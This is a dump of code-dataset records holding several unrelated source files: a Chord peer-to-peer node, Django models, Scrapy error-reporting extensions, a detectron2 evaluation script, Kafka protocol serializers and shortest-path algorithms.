msin(self.Sigma_H * t)), self.V_H.T) return X_t def transport(self, Eta, X, H, t): tauEta = Eta - np.dot(np.dot(np.dot(X, self.V_H), msin(self.Sigma_H * t)) + np.dot(self.U_H, (np.eye(X.shape[1]) - mcos(self.Sigma_H * t))), np.dot(self.U_H.T, Eta)) return tauEta class GrassmannianSVDrank1(SpaceMeta): # see GROUSE method by Balzano et al. def __init__(self, m, k): self.u_H = np.zeros((m,)) self.alpha = 0 self.sigma_H = 0 self.v_H = np.zeros((k,)) self.beta = 0 def get_G(self, grad, X): G = (grad[0] - np.dot(X, np.dot(X.T, grad[0])), grad[1]) return G def get_H(self, G, gamma, tauH): H = (-G[0], G[1]) self.u_H = H[0] / np.linalg.norm(H[0]) self.v_H = H[1] / np.linalg.norm(H[1]) self.sigma_H = np.linalg.norm(H[0]) * np.linalg.norm(H[1]) return H def update_variable(self, X, H, t): X_t = X + np.outer((np.cos(self.sigma_H * t) - 1) * np.dot(X, self.v_H) + np.sin(self.sigma_H * t) * self.u_H, self.v_H) return X_t def transport(self, Eta, X, H, t): pass
en
0.709197
# this function returns the projected gradient # this function computes the search direction from the current projected gradient and the past search direction # this function updates the variable using the search direction and the step size # this function transports an element along H into the tangent space at distance t # see Edelman et al. # see GROUSE method by Balzano et al.
2.786428
3
ChordServer (alt.)/peer.py
hoanhan101/chord
1
6623558
<filename>ChordServer (alt.)/peer.py<gh_stars>1-10 #!/usr/bin/env python3 """ peer.py - A Peer acts as a Server and a Client Author: - <NAME> (<EMAIL>) - <NAME> (<EMAIL>) Date: 11/15/2017 """ import zerorpc from chord_instance import ChordInstance from const import * from utils import * from threading import Thread class Server(Thread): def __init__(self): Thread.__init__(self) def run(self): try: print("SERVER_THREAD IS RUNNING") s = zerorpc.Server(my_chord_instance) s.bind("tcp://{0}:{1}".format(my_IP, default_port)) s.run() except KeyboardInterrupt: print("Exit using KeyboardInterrupt") class Client(Thread): def __init__(self): Thread.__init__(self) def run(self): try: print("CLIENT_THREAD IS RUNNING") your_IP = input("Enter IP to join: ") c = zerorpc.Client() c.connect("tcp://{0}:{1}".format(your_IP, default_port)) if c.is_alive(): instance_list = deserialize(c.get_instance_list()) # append to a local list and join the first instance (can be anyone in the list) instance_list.append(my_chord_instance) my_chord_instance.join(instance_list[0]) # update the instance list locally my_chord_instance.set_instance_list(serialize(instance_list)) # update other instance list using RPC as well for instance in my_chord_instance.instance_list: if instance.IP_ADDRESS != my_IP: temp_client = zerorpc.Client() temp_client.connect("tcp://{0}:{1}".format(instance.IP_ADDRESS, default_port)) temp_client.set_instance_list(serialize(instance_list)) except KeyboardInterrupt: print("Exit using KeyboardInterrupt") if __name__ == '__main__': my_IP = get_my_IP() # temporary instance list, use to startup a chord instance # real instance list is an attribute in chord instance instance_list = [] my_chord_instance = ChordInstance(my_IP, default_port) instance_list.append(my_chord_instance) server = Server() client = Client() server.start() client.start()
<filename>ChordServer (alt.)/peer.py<gh_stars>1-10 #!/usr/bin/env python3 """ peer.py - A Peer acts as a Server and a Client Author: - <NAME> (<EMAIL>) - <NAME> (<EMAIL>) Date: 11/15/2017 """ import zerorpc from chord_instance import ChordInstance from const import * from utils import * from threading import Thread class Server(Thread): def __init__(self): Thread.__init__(self) def run(self): try: print("SERVER_THREAD IS RUNNING") s = zerorpc.Server(my_chord_instance) s.bind("tcp://{0}:{1}".format(my_IP, default_port)) s.run() except KeyboardInterrupt: print("Exit using KeyboardInterrupt") class Client(Thread): def __init__(self): Thread.__init__(self) def run(self): try: print("CLIENT_THREAD IS RUNNING") your_IP = input("Enter IP to join: ") c = zerorpc.Client() c.connect("tcp://{0}:{1}".format(your_IP, default_port)) if c.is_alive(): instance_list = deserialize(c.get_instance_list()) # append to a local list and join the first instance (can be anyone in the list) instance_list.append(my_chord_instance) my_chord_instance.join(instance_list[0]) # update the instance list locally my_chord_instance.set_instance_list(serialize(instance_list)) # update other instance list using RPC as well for instance in my_chord_instance.instance_list: if instance.IP_ADDRESS != my_IP: temp_client = zerorpc.Client() temp_client.connect("tcp://{0}:{1}".format(instance.IP_ADDRESS, default_port)) temp_client.set_instance_list(serialize(instance_list)) except KeyboardInterrupt: print("Exit using KeyboardInterrupt") if __name__ == '__main__': my_IP = get_my_IP() # temporary instance list, use to startup a chord instance # real instance list is an attribute in chord instance instance_list = [] my_chord_instance = ChordInstance(my_IP, default_port) instance_list.append(my_chord_instance) server = Server() client = Client() server.start() client.start()
en
0.753508
#!/usr/bin/env python3 peer.py - A Peer acts as a Server and a Client Author: - <NAME> (<EMAIL>) - <NAME> (<EMAIL>) Date: 11/15/2017 # append to a local list and join the first instance (can be anyone in the list) # update the instance list locally # update other instance list using RPC as well # temporary instance list, use to startup a chord instance # real instance list is an attribute in chord instance
2.950428
3
ap/models.py
edithamadi/Awwwards
0
6623559
<reponame>edithamadi/Awwwards<gh_stars>0 from django.db import models from django.contrib.auth.models import User # Create your models here. class Projects(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE,primary_key = True) title = models.TextField(max_length = 20, default="title here") landing_page_image = models.ImageField(upload_to = 'images/') description = models.TextField() # link_to_live_site = models.URLField(max_length=250,default = ) def __str__(self): return self.user.username def save_projects(self): self.save() def delete_projects(self): self.delete() @classmethod def search_projects(cls , search_term): projects = cls.objects.filter( first_name__icontains = search_term ) return projects class Profile(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE,primary_key = True) first_name = models.CharField(max_length=30) last_name = models.CharField(max_length=30) profile_photo = models.ImageField(upload_to='profile/') bio = models.CharField(max_length=200) projects = models.ForeignKey(Projects, null=True) user_contact_info=models.IntegerField(default=0) def __str__(self): return self.user.username def save_profile(self): self.save() def delete_profile(self): self.delete() @classmethod def search_profile(cls , search_term): profiles = cls.objects.filter( first_name__icontains = search_term ) return profiles
from django.db import models from django.contrib.auth.models import User # Create your models here. class Projects(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE,primary_key = True) title = models.TextField(max_length = 20, default="title here") landing_page_image = models.ImageField(upload_to = 'images/') description = models.TextField() # link_to_live_site = models.URLField(max_length=250,default = ) def __str__(self): return self.user.username def save_projects(self): self.save() def delete_projects(self): self.delete() @classmethod def search_projects(cls , search_term): projects = cls.objects.filter( first_name__icontains = search_term ) return projects class Profile(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE,primary_key = True) first_name = models.CharField(max_length=30) last_name = models.CharField(max_length=30) profile_photo = models.ImageField(upload_to='profile/') bio = models.CharField(max_length=200) projects = models.ForeignKey(Projects, null=True) user_contact_info=models.IntegerField(default=0) def __str__(self): return self.user.username def save_profile(self): self.save() def delete_profile(self): self.delete() @classmethod def search_profile(cls , search_term): profiles = cls.objects.filter( first_name__icontains = search_term ) return profiles
en
0.374589
# Create your models here. # link_to_live_site = models.URLField(max_length=250,default = )
2.308125
2
nrc/nrc/extensions/failLogger.py
SkyTruth/scraper
2
6623560
import StringIO from datetime import datetime import smtplib import traceback from scrapy import signals from scrapy import log from nrc import settings class FailLogger(object): @classmethod def from_crawler(cls, crawler): ext = cls() crawler.signals.connect(ext.spider_error, signal=signals.spider_error) crawler.signals.connect(ext.spider_close, signal=signals.spider_closed) return ext def spider_error(self, failure, response, spider): spider.exception_count += 1 if spider.exception_count == 1: # email on first exception temp = StringIO.StringIO() temp.write("Uncaught exception from {0}:\n\t{1}\n\n" .format(spider.name, failure.getErrorMessage())) failure.printTraceback(file=temp) message = temp.getvalue() self.send_error_email (spider, message, failure) temp.close() def spider_close(self, spider, reason): if spider.exception_count > 1: message = ("Total of %s uncaught exceptions in %s execution." % (spider.exception_count, spider.name)) self.send_error_email (spider, message) @staticmethod def report_exception(spider, e, srcmsg=""): spider.exception_count += 1 if spider.exception_count == 1: msg = ("{0}\nUncaught exception from {1}:\n\t{2}\n\n{3}" .format(srcmsg, spider.name, e, traceback.format_exc())) FailLogger.send_error_email (spider, msg, e) @staticmethod def send_error_email (spider, message, failure=None): if isinstance(failure, Exception): subject = ('%s Exception: %s' % (spider.name, failure)) elif failure: subject = ('%s Exception: %s' % (spider.name, failure.getErrorMessage())) else: subject = '%s: %s Exceptions' % (spider.name, spider.exception_count) spider.log ('Sending alert:\n\t%s' % (subject,), log.ERROR) senddate = datetime.strftime(datetime.now(), '%Y-%m-%d') header = ("Date: %s\r\nFrom: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n" % (senddate, settings.MAIL_FROM, settings.MAIL_TO, subject)) server = smtplib.SMTP('%s:%s' % (settings.MAIL_HOST, settings.MAIL_PORT)) server.starttls() server.login(settings.MAIL_USER, settings.MAIL_PASS) server.sendmail(settings.MAIL_FROM, settings.MAIL_TO, header+message) server.quit()
import StringIO from datetime import datetime import smtplib import traceback from scrapy import signals from scrapy import log from nrc import settings class FailLogger(object): @classmethod def from_crawler(cls, crawler): ext = cls() crawler.signals.connect(ext.spider_error, signal=signals.spider_error) crawler.signals.connect(ext.spider_close, signal=signals.spider_closed) return ext def spider_error(self, failure, response, spider): spider.exception_count += 1 if spider.exception_count == 1: # email on first exception temp = StringIO.StringIO() temp.write("Uncaught exception from {0}:\n\t{1}\n\n" .format(spider.name, failure.getErrorMessage())) failure.printTraceback(file=temp) message = temp.getvalue() self.send_error_email (spider, message, failure) temp.close() def spider_close(self, spider, reason): if spider.exception_count > 1: message = ("Total of %s uncaught exceptions in %s execution." % (spider.exception_count, spider.name)) self.send_error_email (spider, message) @staticmethod def report_exception(spider, e, srcmsg=""): spider.exception_count += 1 if spider.exception_count == 1: msg = ("{0}\nUncaught exception from {1}:\n\t{2}\n\n{3}" .format(srcmsg, spider.name, e, traceback.format_exc())) FailLogger.send_error_email (spider, msg, e) @staticmethod def send_error_email (spider, message, failure=None): if isinstance(failure, Exception): subject = ('%s Exception: %s' % (spider.name, failure)) elif failure: subject = ('%s Exception: %s' % (spider.name, failure.getErrorMessage())) else: subject = '%s: %s Exceptions' % (spider.name, spider.exception_count) spider.log ('Sending alert:\n\t%s' % (subject,), log.ERROR) senddate = datetime.strftime(datetime.now(), '%Y-%m-%d') header = ("Date: %s\r\nFrom: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n" % (senddate, settings.MAIL_FROM, settings.MAIL_TO, subject)) server = smtplib.SMTP('%s:%s' % (settings.MAIL_HOST, settings.MAIL_PORT)) server.starttls() server.login(settings.MAIL_USER, settings.MAIL_PASS) server.sendmail(settings.MAIL_FROM, settings.MAIL_TO, header+message) server.quit()
en
0.726257
# email on first exception
2.392714
2
src/inference.py
aidotse/d2seabirds
0
6623561
# Some basic setup: import torch, torchvision # Setup detectron2 logger import detectron2 from detectron2.utils.logger import setup_logger setup_logger() # import some common libraries import numpy as np import os, json, cv2, random from skimage.io import imread from skimage.segmentation import mark_boundaries from skimage.measure import label, regionprops, find_contours # import some common detectron2 utilities from detectron2 import model_zoo from detectron2.engine import DefaultPredictor from detectron2.config import get_cfg from detectron2.utils.visualizer import Visualizer from detectron2.data import MetadataCatalog, DatasetCatalog, build_detection_test_loader import pycocotools from PIL import Image, ImageDraw import numpy as np import ipdb from detectron2.structures import BoxMode from detectron2.engine import DefaultTrainer import detectron2.data.transforms as T from detectron2.data import DatasetMapper import re from detectron2.evaluation import COCOEvaluator, inference_on_dataset # Only one sequence will be considered. Just one video. # Paths with multiple images parent_annotation_path="/home/juan.vallado/data/YoutubeVIS/train/Annotations/" parent_image_path="/home/juan.vallado/data/YoutubeVIS/train/JPEGImages/" output_dir = "/home/appuser/output" # Get datasets dataset1 = os.listdir('/home/appuser/output')[0] dataset2 = os.listdir('/home/appuser/output')[1] datasets = [dataset1, dataset2] def get_youtube_dicts(img_dir, mask_dir): id = 0 data = [] for image in os.listdir(img_dir): #if id == 0: # record['annotations']=[] mask_path = os.path.join(mask_dir, "{}.png".format(image[:-4])) im=Image.open(mask_path) record = {} record['file_name']=os.path.join(img_dir, image) record['image_id']=id record['height']=im.size[1] record['width']=im.size[0] ann = {} objects = list(np.unique(np.asarray(im))) stuff = [] for i in objects[1:]: ann['bbox']=extract_bboxes(np.where(np.asarray(im, order="F")==i, i, 0), im) ann['bbox_mode']=BoxMode.XYWH_ABS #ipdb.set_trace() ann['segmentation']=pycocotools.mask.encode( \ np.asfortranarray( \ np.where(np.asarray(im, order="F")==i, i, 0) \ .astype(np.uint8) ) ) ann['category_id']=0 stuff.append(ann) ann={} record['annotations']=stuff data.append(record) segm = [] id = id+1 return data def extract_bboxes(arr, im): # Extract class props = regionprops(arr) assert len(props) == 1, "Error: Expected one mask, but got {}".format(len(props)) assert props[0].area > 0, "Error: Area of mask is <0!" rmin, cmin, rmax, cmax=props[0].bbox return [float(cmin), float(rmin), float(cmax-cmin), float(rmax-rmin)] #return props[0].bbox def register(annotation_path, image_path, name): for d in ["train", "test"]: DatasetCatalog.register("ytvis_{}_".format(name) + d, lambda d=d: get_youtube_dicts("{0}/{1}".format(image_path, d), "{0}/{1}".format(annotation_path, d))) MetadataCatalog.get("ytvis_{}_".format(name) + d).thing_classes = ["target"] # Register datasets def register_datasets(): cfg = get_cfg() for dataset in datasets: cfg.merge_from_file("/home/appuser/output/{}/config.yaml".format(dataset)) if cfg.MODEL.BACKBONE.FREEZE_AT == 2: # BL model annotation_path = os.path.join(parent_annotation_path, dataset) image_path = os.path.join(parent_image_path, dataset) register(annotation_path, image_path, "bl") else: annotation_path = os.path.join(parent_annotation_path, dataset) image_path = os.path.join(parent_image_path, dataset) register(annotation_path, image_path, "tl") # Declare model and prepare weights for inference cfg = get_cfg() cfg.merge_from_file("/home/appuser/output/{}/config.yaml".format(dataset)) cfg.MODEL.WEIGHTS = os.path.join("/home/appuser/output/{}".format(dataset), "model_final.pth") # path to the model we just trained cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.7 # set a custom testing threshold #ipdb.set_trace() return cfg # Prueba cfg = register_datasets() from detectron2.utils.visualizer import ColorMode predictor = DefaultPredictor(cfg) # Results for first dataset evaluator = COCOEvaluator("ytvis_bl_test", cfg, False, output_dir) val_loader = build_detection_test_loader(cfg, "ytvis_bl_test") inference_on_dataset(predictor.model, val_loader, evaluator) # Results for second dataset evaluator = COCOEvaluator("ytvis_tl_test", cfg, False, output_dir) val_loader = build_detection_test_loader(cfg, "ytvis_tl_test") inference_on_dataset(predictor.model, val_loader, evaluator) dataset_dicts_tl = DatasetCatalog.get("ytvis_tl_test") ytvis_metadata_tl = MetadataCatalog.get("ytvis_tl_train") dataset_dicts_bl = DatasetCatalog.get("ytvis_bl_test") ytvis_metadata_bl = MetadataCatalog.get("ytvis_bl_train") #Save images from tl model imgs = [] for d in random.sample(dataset_dicts_tl, 3): im = cv2.imread(d["file_name"]) outputs = predictor(im) # format is documented at https://detectron2.readthedocs.io/tutorials/models.html#model-output-format v = Visualizer(im[:, :, ::-1], metadata=ytvis_metadata_tl, scale=0.5, instance_mode=ColorMode.IMAGE_BW # remove the colors of unsegmented pixels. This option is only available for segmentation models ) out = v.draw_instance_predictions(outputs["instances"].to("cpu")) imgs.append(out.get_image()[:, :, ::-1]) for i in range (0, len(imgs)): cv2.imwrite("output/{}tl.jpg".format(i), imgs[i]) #Save images from bl model imgs = [] for d in random.sample(dataset_dicts_bl, 3): im = cv2.imread(d["file_name"]) outputs = predictor(im) # format is documented at https://detectron2.readthedocs.io/tutorials/models.html#model-output-format v = Visualizer(im[:, :, ::-1], metadata=ytvis_metadata_bl, scale=0.5, instance_mode=ColorMode.IMAGE_BW # remove the colors of unsegmented pixels. This option is only available for segmentation models ) out = v.draw_instance_predictions(outputs["instances"].to("cpu")) imgs.append(out.get_image()[:, :, ::-1]) for i in range (0, len(imgs)): cv2.imwrite("output/{}bl.jpg".format(i), imgs[i])
# Some basic setup: import torch, torchvision # Setup detectron2 logger import detectron2 from detectron2.utils.logger import setup_logger setup_logger() # import some common libraries import numpy as np import os, json, cv2, random from skimage.io import imread from skimage.segmentation import mark_boundaries from skimage.measure import label, regionprops, find_contours # import some common detectron2 utilities from detectron2 import model_zoo from detectron2.engine import DefaultPredictor from detectron2.config import get_cfg from detectron2.utils.visualizer import Visualizer from detectron2.data import MetadataCatalog, DatasetCatalog, build_detection_test_loader import pycocotools from PIL import Image, ImageDraw import numpy as np import ipdb from detectron2.structures import BoxMode from detectron2.engine import DefaultTrainer import detectron2.data.transforms as T from detectron2.data import DatasetMapper import re from detectron2.evaluation import COCOEvaluator, inference_on_dataset # Only one sequence will be considered. Just one video. # Paths with multiple images parent_annotation_path="/home/juan.vallado/data/YoutubeVIS/train/Annotations/" parent_image_path="/home/juan.vallado/data/YoutubeVIS/train/JPEGImages/" output_dir = "/home/appuser/output" # Get datasets dataset1 = os.listdir('/home/appuser/output')[0] dataset2 = os.listdir('/home/appuser/output')[1] datasets = [dataset1, dataset2] def get_youtube_dicts(img_dir, mask_dir): id = 0 data = [] for image in os.listdir(img_dir): #if id == 0: # record['annotations']=[] mask_path = os.path.join(mask_dir, "{}.png".format(image[:-4])) im=Image.open(mask_path) record = {} record['file_name']=os.path.join(img_dir, image) record['image_id']=id record['height']=im.size[1] record['width']=im.size[0] ann = {} objects = list(np.unique(np.asarray(im))) stuff = [] for i in objects[1:]: ann['bbox']=extract_bboxes(np.where(np.asarray(im, order="F")==i, i, 0), im) ann['bbox_mode']=BoxMode.XYWH_ABS #ipdb.set_trace() ann['segmentation']=pycocotools.mask.encode( \ np.asfortranarray( \ np.where(np.asarray(im, order="F")==i, i, 0) \ .astype(np.uint8) ) ) ann['category_id']=0 stuff.append(ann) ann={} record['annotations']=stuff data.append(record) segm = [] id = id+1 return data def extract_bboxes(arr, im): # Extract class props = regionprops(arr) assert len(props) == 1, "Error: Expected one mask, but got {}".format(len(props)) assert props[0].area > 0, "Error: Area of mask is <0!" rmin, cmin, rmax, cmax=props[0].bbox return [float(cmin), float(rmin), float(cmax-cmin), float(rmax-rmin)] #return props[0].bbox def register(annotation_path, image_path, name): for d in ["train", "test"]: DatasetCatalog.register("ytvis_{}_".format(name) + d, lambda d=d: get_youtube_dicts("{0}/{1}".format(image_path, d), "{0}/{1}".format(annotation_path, d))) MetadataCatalog.get("ytvis_{}_".format(name) + d).thing_classes = ["target"] # Register datasets def register_datasets(): cfg = get_cfg() for dataset in datasets: cfg.merge_from_file("/home/appuser/output/{}/config.yaml".format(dataset)) if cfg.MODEL.BACKBONE.FREEZE_AT == 2: # BL model annotation_path = os.path.join(parent_annotation_path, dataset) image_path = os.path.join(parent_image_path, dataset) register(annotation_path, image_path, "bl") else: annotation_path = os.path.join(parent_annotation_path, dataset) image_path = os.path.join(parent_image_path, dataset) register(annotation_path, image_path, "tl") # Declare model and prepare weights for inference cfg = get_cfg() cfg.merge_from_file("/home/appuser/output/{}/config.yaml".format(dataset)) cfg.MODEL.WEIGHTS = os.path.join("/home/appuser/output/{}".format(dataset), "model_final.pth") # path to the model we just trained cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.7 # set a custom testing threshold #ipdb.set_trace() return cfg # Prueba cfg = register_datasets() from detectron2.utils.visualizer import ColorMode predictor = DefaultPredictor(cfg) # Results for first dataset evaluator = COCOEvaluator("ytvis_bl_test", cfg, False, output_dir) val_loader = build_detection_test_loader(cfg, "ytvis_bl_test") inference_on_dataset(predictor.model, val_loader, evaluator) # Results for second dataset evaluator = COCOEvaluator("ytvis_tl_test", cfg, False, output_dir) val_loader = build_detection_test_loader(cfg, "ytvis_tl_test") inference_on_dataset(predictor.model, val_loader, evaluator) dataset_dicts_tl = DatasetCatalog.get("ytvis_tl_test") ytvis_metadata_tl = MetadataCatalog.get("ytvis_tl_train") dataset_dicts_bl = DatasetCatalog.get("ytvis_bl_test") ytvis_metadata_bl = MetadataCatalog.get("ytvis_bl_train") #Save images from tl model imgs = [] for d in random.sample(dataset_dicts_tl, 3): im = cv2.imread(d["file_name"]) outputs = predictor(im) # format is documented at https://detectron2.readthedocs.io/tutorials/models.html#model-output-format v = Visualizer(im[:, :, ::-1], metadata=ytvis_metadata_tl, scale=0.5, instance_mode=ColorMode.IMAGE_BW # remove the colors of unsegmented pixels. This option is only available for segmentation models ) out = v.draw_instance_predictions(outputs["instances"].to("cpu")) imgs.append(out.get_image()[:, :, ::-1]) for i in range (0, len(imgs)): cv2.imwrite("output/{}tl.jpg".format(i), imgs[i]) #Save images from bl model imgs = [] for d in random.sample(dataset_dicts_bl, 3): im = cv2.imread(d["file_name"]) outputs = predictor(im) # format is documented at https://detectron2.readthedocs.io/tutorials/models.html#model-output-format v = Visualizer(im[:, :, ::-1], metadata=ytvis_metadata_bl, scale=0.5, instance_mode=ColorMode.IMAGE_BW # remove the colors of unsegmented pixels. This option is only available for segmentation models ) out = v.draw_instance_predictions(outputs["instances"].to("cpu")) imgs.append(out.get_image()[:, :, ::-1]) for i in range (0, len(imgs)): cv2.imwrite("output/{}bl.jpg".format(i), imgs[i])
en
0.738856
# Some basic setup: # Setup detectron2 logger # import some common libraries # import some common detectron2 utilities # Only one sequence will be considered. Just one video. # Paths with multiple images # Get datasets #if id == 0: # record['annotations']=[] #ipdb.set_trace() # Extract class #return props[0].bbox # Register datasets # BL model # Declare model and prepare weights for inference # path to the model we just trained # set a custom testing threshold #ipdb.set_trace() # Prueba # Results for first dataset # Results for second dataset #Save images from tl model # format is documented at https://detectron2.readthedocs.io/tutorials/models.html#model-output-format # remove the colors of unsegmented pixels. This option is only available for segmentation models #Save images from bl model # format is documented at https://detectron2.readthedocs.io/tutorials/models.html#model-output-format # remove the colors of unsegmented pixels. This option is only available for segmentation models
2.113851
2
aioscrapy/middleware/middleware_extension.py
conlin-huang/aio-scrapy
13
6623562
<reponame>conlin-huang/aio-scrapy """ The Extension Manager See documentation in docs/topics/extensions.rst """ from .middleware import MiddlewareManager from scrapy.utils.conf import build_component_list class ExtensionManager(MiddlewareManager): component_name = 'extension' @classmethod def _get_mwlist_from_settings(cls, settings): return build_component_list(settings.getwithbase('EXTENSIONS'))
""" The Extension Manager See documentation in docs/topics/extensions.rst """ from .middleware import MiddlewareManager from scrapy.utils.conf import build_component_list class ExtensionManager(MiddlewareManager): component_name = 'extension' @classmethod def _get_mwlist_from_settings(cls, settings): return build_component_list(settings.getwithbase('EXTENSIONS'))
en
0.494707
The Extension Manager See documentation in docs/topics/extensions.rst
1.613875
2
esque_wire/protocol/serializers/api/controlled_shutdown_response.py
real-digital/esque-wire
0
6623563
<gh_stars>0 ############################################################### # Autogenerated module. Please don't modify. # # Edit according file in protocol_generator/templates instead # ############################################################### from typing import Dict from ...structs.api.controlled_shutdown_response import ControlledShutdownResponseData, RemainingPartition from ._main_serializers import ( ArraySerializer, ClassSerializer, Schema, errorCodeSerializer, int32Serializer, stringSerializer, ) remainingPartitionSchemas: Dict[int, Schema] = { 0: [("topic_name", stringSerializer), ("partition_index", int32Serializer)], 1: [("topic_name", stringSerializer), ("partition_index", int32Serializer)], 2: [("topic_name", stringSerializer), ("partition_index", int32Serializer)], } remainingPartitionSerializers: Dict[int, ClassSerializer[RemainingPartition]] = { version: ClassSerializer(RemainingPartition, schema) for version, schema in remainingPartitionSchemas.items() } remainingPartitionSerializers[-1] = remainingPartitionSerializers[2] controlledShutdownResponseDataSchemas: Dict[int, Schema] = { 0: [ ("error_code", errorCodeSerializer), ("remaining_partitions", ArraySerializer(remainingPartitionSerializers[0])), ], 1: [ ("error_code", errorCodeSerializer), ("remaining_partitions", ArraySerializer(remainingPartitionSerializers[1])), ], 2: [ ("error_code", errorCodeSerializer), ("remaining_partitions", ArraySerializer(remainingPartitionSerializers[2])), ], } controlledShutdownResponseDataSerializers: Dict[int, ClassSerializer[ControlledShutdownResponseData]] = { version: ClassSerializer(ControlledShutdownResponseData, schema) for version, schema in controlledShutdownResponseDataSchemas.items() } controlledShutdownResponseDataSerializers[-1] = controlledShutdownResponseDataSerializers[2]
############################################################### # Autogenerated module. Please don't modify. # # Edit according file in protocol_generator/templates instead # ############################################################### from typing import Dict from ...structs.api.controlled_shutdown_response import ControlledShutdownResponseData, RemainingPartition from ._main_serializers import ( ArraySerializer, ClassSerializer, Schema, errorCodeSerializer, int32Serializer, stringSerializer, ) remainingPartitionSchemas: Dict[int, Schema] = { 0: [("topic_name", stringSerializer), ("partition_index", int32Serializer)], 1: [("topic_name", stringSerializer), ("partition_index", int32Serializer)], 2: [("topic_name", stringSerializer), ("partition_index", int32Serializer)], } remainingPartitionSerializers: Dict[int, ClassSerializer[RemainingPartition]] = { version: ClassSerializer(RemainingPartition, schema) for version, schema in remainingPartitionSchemas.items() } remainingPartitionSerializers[-1] = remainingPartitionSerializers[2] controlledShutdownResponseDataSchemas: Dict[int, Schema] = { 0: [ ("error_code", errorCodeSerializer), ("remaining_partitions", ArraySerializer(remainingPartitionSerializers[0])), ], 1: [ ("error_code", errorCodeSerializer), ("remaining_partitions", ArraySerializer(remainingPartitionSerializers[1])), ], 2: [ ("error_code", errorCodeSerializer), ("remaining_partitions", ArraySerializer(remainingPartitionSerializers[2])), ], } controlledShutdownResponseDataSerializers: Dict[int, ClassSerializer[ControlledShutdownResponseData]] = { version: ClassSerializer(ControlledShutdownResponseData, schema) for version, schema in controlledShutdownResponseDataSchemas.items() } controlledShutdownResponseDataSerializers[-1] = controlledShutdownResponseDataSerializers[2]
de
0.58148
############################################################### # Autogenerated module. Please don't modify. # # Edit according file in protocol_generator/templates instead # ###############################################################
1.516159
2
s3/py/dijkstra2.py
lisiynos/lisiynos.github.io
1
6623564
<gh_stars>1-10 # -*- utf-8 -*- # <NAME> from tkinter import Pack N, M, start = map(int, input().split()) E = [] * N for i in range(M): f, t, w = map(int, input().split()) # Неориентированный граф E[f].append((t, w)) E[t].append((f, w)) INF = 10 ** 10 # Бесконечность d = [INF] * N # Кратчайшее расстояние до первой вершины Colored = [False] * N # Когда нашли кратчайший путь -> красим вершину Path = [-1] * N # Предыдущая вершина add = start min_d = 0 while min_d != INF: # Добавляем новую вершину Colored[add] = True d[add] = min_d # Пересчитываем пути через вершину add for t, w in E[add]: if d[add] + w < d[t]: d[t] = d[add] + w Path[t] = add # Ищем минимум min_d = INF for i in range(N): if not Colored[i] and d[i] < min_d: min_d = d[i] add = i # Трёхмерная динамика во Флойде # [k][i][j] - используя вершины с 1-ой по k-ую d = [[[0] * (N + 1) for i in range(N + 1)] for j in range(N + 1)] for k in range(1, N + 1): for i in range(1, N + 1): for j in range(1, N + 1): d[k][i][j] = min(d[k - 1][i][j], d[k - 1][i][k] + d[k - 1][k][j]) # Сведение к квадратной матрице F = [[0] * (N + 1) for i in range(N + 1)] for k in range(1, N + 1): for i in range(1, N + 1): for j in range(1, N + 1): F[i][j] = min(F[i][j], F[i][k] + F[k][j]) # Флойд с восстановлением пути F = [[0] * (N + 1) for i in range(N + 1)] prev = [list(range(N + 1)) for i in range(N + 1)] for k in range(1, N + 1): for i in range(1, N + 1): for j in range(1, N + 1): if F[i][k] + F[k][j] < F[i][j]: F[i][j] = F[i][k] + F[k][j] prev[i][j] = prev[k][j] def show_path(i, j): k = prev[i][j] if k == i: print(i, end=' ') return show_path(i, k) show_path(k, j)
# -*- utf-8 -*- # <NAME> from tkinter import Pack N, M, start = map(int, input().split()) E = [] * N for i in range(M): f, t, w = map(int, input().split()) # Неориентированный граф E[f].append((t, w)) E[t].append((f, w)) INF = 10 ** 10 # Бесконечность d = [INF] * N # Кратчайшее расстояние до первой вершины Colored = [False] * N # Когда нашли кратчайший путь -> красим вершину Path = [-1] * N # Предыдущая вершина add = start min_d = 0 while min_d != INF: # Добавляем новую вершину Colored[add] = True d[add] = min_d # Пересчитываем пути через вершину add for t, w in E[add]: if d[add] + w < d[t]: d[t] = d[add] + w Path[t] = add # Ищем минимум min_d = INF for i in range(N): if not Colored[i] and d[i] < min_d: min_d = d[i] add = i # Трёхмерная динамика во Флойде # [k][i][j] - используя вершины с 1-ой по k-ую d = [[[0] * (N + 1) for i in range(N + 1)] for j in range(N + 1)] for k in range(1, N + 1): for i in range(1, N + 1): for j in range(1, N + 1): d[k][i][j] = min(d[k - 1][i][j], d[k - 1][i][k] + d[k - 1][k][j]) # Сведение к квадратной матрице F = [[0] * (N + 1) for i in range(N + 1)] for k in range(1, N + 1): for i in range(1, N + 1): for j in range(1, N + 1): F[i][j] = min(F[i][j], F[i][k] + F[k][j]) # Флойд с восстановлением пути F = [[0] * (N + 1) for i in range(N + 1)] prev = [list(range(N + 1)) for i in range(N + 1)] for k in range(1, N + 1): for i in range(1, N + 1): for j in range(1, N + 1): if F[i][k] + F[k][j] < F[i][j]: F[i][j] = F[i][k] + F[k][j] prev[i][j] = prev[k][j] def show_path(i, j): k = prev[i][j] if k == i: print(i, end=' ') return show_path(i, k) show_path(k, j)
ru
0.991109
# -*- utf-8 -*- # <NAME> # Неориентированный граф # Бесконечность # Кратчайшее расстояние до первой вершины # Когда нашли кратчайший путь -> красим вершину # Предыдущая вершина # Добавляем новую вершину # Пересчитываем пути через вершину add # Ищем минимум # Трёхмерная динамика во Флойде # [k][i][j] - используя вершины с 1-ой по k-ую # Сведение к квадратной матрице # Флойд с восстановлением пути
2.776426
3
pyclitr.py
jrenslin/pyclitr
0
6623565
